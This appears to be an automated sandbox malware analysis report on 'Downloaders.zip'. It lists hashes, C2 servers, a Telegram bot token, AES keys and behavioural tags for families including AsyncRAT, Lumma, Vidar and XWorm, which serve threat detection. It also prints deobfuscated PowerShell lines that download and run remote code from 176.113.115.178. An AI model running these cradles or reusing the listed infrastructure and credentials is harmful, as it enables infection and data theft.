asyncrat

Target

Downloaders.zip
Size

12KB
Sample

241126-3a6byavlhw
MD5

94fe78dc42e3403d06477f995770733c
SHA1

ea6ba4a14bab2a976d62ea7ddd4940ec90560586
SHA256

16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
SHA512

add85726e7d2c69068381688fe84defe820f600e6214eff029042e3002e9f4ad52dde3b8bb28f4148cca1b950cd54d3999ce9e8445c4562d1ef2efdb1c6bdeff
SSDEEP

384:6BfwcSEp9ZjKXSBIDv4dDfjlMJ7HWTHWB:efACW6Dr8HWTHWB

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

62.113.117.95:4449

127.0.0.1:4449

135.181.185.254:4449

212.15.49.155:4449

Mutex

hwelcvbupaqfzors

Attributes

delay
10
install
false
install_folder
%AppData%

aes.plain

1
ZHF9P7iFulHlWbWS68wXXEkz427S7oLd

aes.plain

1
KajP9tXiDDV7BstvpjBTYJC8dIkBhCbi

aes.plain

1
AcD0UO8HowANbeP1R8flJaR4EKTPmZ7C

Extracted

Family

lumma

https://servicedny.site

https://authorisev.site

https://faulteyotk.site

https://dilemmadu.site

https://contemteny.site

https://goalyfeastz.site

https://opposezmny.site

https://seallysl.site

Extracted

Family

vidar

Version

10.6

Botnet

1a72eb06939ea478753d5c4df4b2bd32

https://steamcommunity.com/profiles/76561199747278259

https://t.me/armad2a

Attributes

user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36

Extracted

Family

phorphiex

http://185.215.113.84

http://185.215.113.66

Extracted

Family

xworm

Version

3.1

needforrat.hopto.org:7000

18.181.154.24:7000

Attributes

Install_directory
%AppData%
install_file
USB.exe

aes.plain

1
YoHJGCEVUdnTyp2xxqxwZA==

Extracted

Family

xworm

Version

3.0

Attributes

Install_directory
%Temp%
install_file
USB.exe
pastebin_url
https://pastebin.com/raw/ct3KF8KR
telegram
https://api.telegram.org/bot6705170780:AAFLOXrnAOxDhNu3tap1IE119Otvgco_CbY/sendMessage?chat_id=6084847021

Extracted

Family

redline

38.180.72.54:42814

Extracted

Family

gurcu

https://api.telegram.org/bot6705170780:AAFLOXrnAOxDhNu3tap1IE119Otvgco_CbY/sendMessage?chat_id=6084847021

Extracted

Language

ps1

Deobfuscated

1
# powershell snippet 0
2
$c1 = "%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e"
3
$c4 = "b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%"
4
$c3 = "a%%dSt%%%%ri%%%%%n%%%g('http://176.113.115.178/FF/2.png')"
5
$tc = "%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%eb%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%a%%dSt%%%%ri%%%%%n%%%g('http://176.113.115.178/FF/2.png')"
6
$tc = "(New-Object Net.WebClient).DownloadString('http://176.113.115.178/FF/2.png')"
7
invoke-expression "(New-Object Net.WebClient).DownloadString('http://176.113.115.178/FF/2.png')"|invoke-expression
8
9
# powershell snippet 1
10
(new-object net.webclient).downloadstring("http://176.113.115.178/FF/2.png")
11

URLs

ps1.dropper

http://176.113.115.178/FF/2.png

Extracted

Language

ps1

Deobfuscated

1
# powershell snippet 0
2
$c1 = "%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e"
3
$c4 = "b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%"
4
$c3 = "a%%dSt%%%%ri%%%%%n%%%g('http://176.113.115.178/FF/3.png')"
5
$tc = "%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%eb%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%a%%dSt%%%%ri%%%%%n%%%g('http://176.113.115.178/FF/3.png')"
6
$tc = "(New-Object Net.WebClient).DownloadString('http://176.113.115.178/FF/3.png')"
7
invoke-expression "(New-Object Net.WebClient).DownloadString('http://176.113.115.178/FF/3.png')"|invoke-expression
8
9
# powershell snippet 1
10
(new-object net.webclient).downloadstring("http://176.113.115.178/FF/3.png")
11

URLs

ps1.dropper

http://176.113.115.178/FF/3.png

Extracted

Family

xenorat

beastsband.com

Mutex

x3n0

Attributes

delay
5000
install_path
nothingset
port
4444
startup_name
nothingset

Extracted

Family

xworm

Version

5.0

68.178.207.33:7000

Mutex

sSM7p4MT4JctLnRS

Attributes

install_file
USB.exe

aes.plain

1
ozsb9n+Nf02EZUyZfjPY5w==

Extracted

Family

lumma

https://push-hook.cyou/api

https://blade-govern.sbs/api

https://story-tense-faz.sbs/api

Targets

- Target
  
  4363463463464363463463463.exe
- Size
  
  10KB
- MD5
  
  2a94f3960c58c6e70826495f76d00b85
- SHA1
  
  e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
- SHA256
  
  2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
- SHA512
  
  fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
- SSDEEP
  
  192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Score

10^/10

asyncrat babbleloader gh0strat gurcu lumma phorphiex purplefox quasar redline sectoprat vidar xmrig xworm 1a72eb06939ea478753d5c4df4b2bd32 default credential_access defense_evasion discovery evasion execution infostealer loader miner persistence privilege_escalation rat rootkit spyware stealer trojan upx worm
- AsyncRat
  AsyncRAT is designed to remotely monitor and control other computers written in C#.
  rat asyncrat
- Asyncrat family
  asyncrat
- BabbleLoader
  BabbleLoader is a malware loader written in C++.
  loader babbleloader
- Babbleloader family
  babbleloader
- Detect PurpleFox Rootkit
  Detect PurpleFox Rootkit.
  rootkit
- Detect Vidar Stealer
  stealer
- Detect Xworm Payload
- Detects BabbleLoader Payload
- Gh0st RAT payload
- Gh0strat
  Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.
  rat gh0strat
- Gh0strat family
  gh0strat
- Gurcu family
  gurcu
- Gurcu, WhiteSnake
  Gurcu aka WhiteSnake is a malware stealer written in C#.
  stealer gurcu
- Lumma Stealer, LummaC
  Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
  stealer lumma
- Lumma family
  lumma
- Phorphiex family
  phorphiex
- Phorphiex payload
- Phorphiex, Phorpiex
  Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
  worm trojan loader phorphiex
- PurpleFox
  PurpleFox is an exploit kit used to distribute other malware families and first seen in 2018.
  rootkit trojan purplefox
- Purplefox family
  purplefox
- Quasar RAT
  Quasar is an open source Remote Access Tool.
  trojan spyware quasar
- Quasar family
  quasar
- Quasar payload
- RedLine
  RedLine Stealer is a malware family written in C#, first appearing in early 2020.
  infostealer redline
- RedLine payload
- Redline family
  redline
- SectopRAT
  SectopRAT is a remote access trojan first seen in November 2019.
  trojan rat sectoprat
- SectopRAT payload
- Sectoprat family
  sectoprat
- Suspicious use of NtCreateUserProcessOtherParentProcess
- UAC bypass
  evasion trojan
- Vidar
  Vidar is an infostealer based on Arkei stealer.
  stealer vidar
- Vidar family
  vidar
- Xmrig family
  xmrig
- Xworm
  Xworm is a remote access trojan written in C#.
  trojan rat xworm
- Xworm family
  xworm
- xmrig
  XMRig is a high performance, open source, cross platform CPU/GPU miner.
  miner xmrig
- XMRig Miner payload
  miner
- Command and Scripting Interpreter: PowerShell
  Powershell Invoke Web Request.
  execution
- Downloads MZ/PE file
- Drops file in Drivers directory
- Sets file to hidden
  Modifies file attributes to stop it showing in Explorer etc.
  evasion
- Sets service image path in registry
  persistence
- Checks computer location settings
  Looks up country code configured in the registry, likely geofence.
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Reads data files stored by FTP clients
  Tries to access configuration files associated with programs like FileZilla.
  spyware stealer
- Reads user/profile data of web browsers
  Infostealers often target stored browser data, which can include saved credentials etc.
  spyware stealer
- Unsecured Credentials: Credentials In Files
  Steal credentials from unsecured files.
  credential_access stealer
- Adds Run key to start application
  persistence
- Checks installed software on the system
  Looks up Uninstall key entries in the registry to enumerate software on the system.
  discovery
- Legitimate hosting services abused for malware hosting/C2
- Looks up external IP address via web service
  Uses a legitimate IP lookup service to find the infected system's external IP.
- AutoIT Executable
  AutoIT scripts compiled to PE executables.
- Drops file in System32 directory
- Enumerates processes with tasklist
  discovery
- Suspicious use of SetThreadContext
- UPX packed file
  Detects executables packed with UPX/modified UPX open source packer.
  upx
behavioral1
- Target
  
  New Text Document mod.exe
- Size
  
  8KB
- MD5
  
  69994ff2f00eeca9335ccd502198e05b
- SHA1
  
  b13a15a5bea65b711b835ce8eccd2a699a99cead
- SHA256
  
  2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
- SHA512
  
  ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3
- SSDEEP
  
  96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1
Score

10^/10

asyncrat lumma xenorat xworm default credential_access defense_evasion discovery evasion execution persistence privilege_escalation rat spyware stealer trojan
- AsyncRat
  AsyncRAT is designed to remotely monitor and control other computers written in C#.
  rat asyncrat
- Asyncrat family
  asyncrat
- Detect XenoRat Payload
- Detect Xworm Payload
- Lumma Stealer, LummaC
  Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
  stealer lumma
- Lumma family
  lumma
- Suspicious use of NtCreateUserProcessOtherParentProcess
- XenorRat
  XenorRat is a remote access trojan written in C#.
  trojan rat xenorat
- Xenorat family
  xenorat
- Xworm
  Xworm is a remote access trojan written in C#.
  trojan rat xworm
- Xworm family
  xworm
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
  evasion
- Command and Scripting Interpreter: PowerShell
  Powershell Invoke Web Request.
  execution
- Downloads MZ/PE file
- Uses browser remote debugging
  Can be used control the browser and steal sensitive information such as credentials and session cookies.
  credential_access stealer
- Checks BIOS information in registry
  BIOS information is often read in order to detect sandboxing environments.
- Checks computer location settings
  Looks up country code configured in the registry, likely geofence.
- Drops startup file
- Executes dropped EXE
- Identifies Wine through registry keys
  Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
  evasion
- Loads dropped DLL
- Reads data files stored by FTP clients
  Tries to access configuration files associated with programs like FileZilla.
  spyware stealer
- Reads user/profile data of local email clients
  Email clients store some user data on disk where infostealers will often target it.
  spyware stealer
- Reads user/profile data of web browsers
  Infostealers often target stored browser data, which can include saved credentials etc.
  spyware stealer
- Unsecured Credentials: Credentials In Files
  Steal credentials from unsecured files.
  credential_access stealer
- Accesses cryptocurrency files/wallets, possible credential harvesting
  spyware
- Adds Run key to start application
  persistence
- Checks installed software on the system
  Looks up Uninstall key entries in the registry to enumerate software on the system.
  discovery
- Indicator Removal: File Deletion
  Adversaries may delete files left behind by the actions of their intrusion activity.
  defense_evasion
- Legitimate hosting services abused for malware hosting/C2
- Looks up external IP address via web service
  Uses a legitimate IP lookup service to find the infected system's external IP.
- Network Service Discovery
  Attempt to gather information on host's network.
  discovery
- AutoIT Executable
  AutoIT scripts compiled to PE executables.
- Drops file in System32 directory
- Enumerates processes with tasklist
  discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
behavioral2